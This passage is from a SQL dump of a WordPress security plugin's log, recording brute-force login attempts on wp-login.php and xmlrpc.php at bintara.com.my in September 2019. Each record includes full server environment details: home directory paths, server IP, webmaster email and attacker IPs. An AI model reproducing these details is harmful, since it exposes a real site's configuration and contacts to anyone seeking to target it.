empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYrxHkXpgmG5P@iB8k36gAAAIA\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"51.15.209.93\";s:11:\"REMOTE_PORT\";s:5:\"45022\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYrxHkXpgmG5P@iB8k36gAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1569074116.27\";s:12:\"REQUEST_TIME\";s:10:\"1569074116\";}}','notice','2019-09-21 13:55:17','2019-09-21 13:55:16',18364352,19661200,'https://bintara.com.my/2019/xmlrpc.php',1,0,'51.15.209.93'),(26068,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYr6zDrcQxTmGrCWuaTjgAAAcc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"195.137.202.165\";s:11:\"REMOTE_PORT\";s:5:\"55872\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYr6zDrcQxTmGrCWuaTjgAAAcc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074155.5697\";s:12:\"REQUEST_TIME\";s:10:\"1569074155\";}}','notice','2019-09-21 13:55:56','2019-09-21 13:55:55',17848240,19338088,'https://bintara.com.my/blog/wp-login.php',1,0,'195.137.202.165'),(26069,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYr7nkXpgmG5P@iB8k4DQAAAI0\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"195.137.202.165\";s:11:\"REMOTE_PORT\";s:5:\"57142\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYr7nkXpgmG5P@iB8k4DQAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074159.0978\";s:12:\"REQUEST_TIME\";s:10:\"1569074159\";}}','notice','2019-09-21 13:56:00','2019-09-21 13:55:59',18363536,19660384,'https://bintara.com.my/blog/xmlrpc.php',1,0,'195.137.202.165'),(26070,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYr9XkXpgmG5P@iB8k4FAAAAJU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.120.254.133\";s:11:\"REMOTE_PORT\";s:5:\"37328\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYr9XkXpgmG5P@iB8k4FAAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569074165.646\";s:12:\"REQUEST_TIME\";s:10:\"1569074165\";}}','notice','2019-09-21 13:56:06','2019-09-21 13:56:06',17850816,19340736,'https://bintara.com.my/wordpress/wp-login.php',1,0,'188.120.254.133'),(26071,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYr@FiJ7D9Gn7wDPh8kFAAAANg\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.120.254.133\";s:11:\"REMOTE_PORT\";s:5:\"37986\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYr@FiJ7D9Gn7wDPh8kFAAAANg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074169.0496\";s:12:\"REQUEST_TIME\";s:10:\"1569074169\";}}','notice','2019-09-21 13:56:10','2019-09-21 13:56:09',18358664,19654432,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'188.120.254.133'),(26072,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYsFnkXpgmG5P@iB8k4KwAAAI8\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"158.69.27.201\";s:11:\"REMOTE_PORT\";s:5:\"51802\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYsFnkXpgmG5P@iB8k4KwAAAI8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074198.2505\";s:12:\"REQUEST_TIME\";s:10:\"1569074198\";}}','notice','2019-09-21 13:56:39','2019-09-21 13:56:38',17846472,19336952,'https://bintara.com.my/test/wp-login.php',1,0,'158.69.27.201'),(26073,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYsGViJ7D9Gn7wDPh8kGwAAANQ\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"158.69.27.201\";s:11:\"REMOTE_PORT\";s:5:\"52514\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYsGViJ7D9Gn7wDPh8kGwAAANQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074201.6796\";s:12:\"REQUEST_TIME\";s:10:\"1569074201\";}}','notice','2019-09-21 13:56:42','2019-09-21 13:56:42',18364288,19662288,'https://bintara.com.my/test/xmlrpc.php',1,0,'158.69.27.201'),(26074,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYsSHkXpgmG5P@iB8k4UQAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"68.183.29.98\";s:11:\"REMOTE_PORT\";s:5:\"58516\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala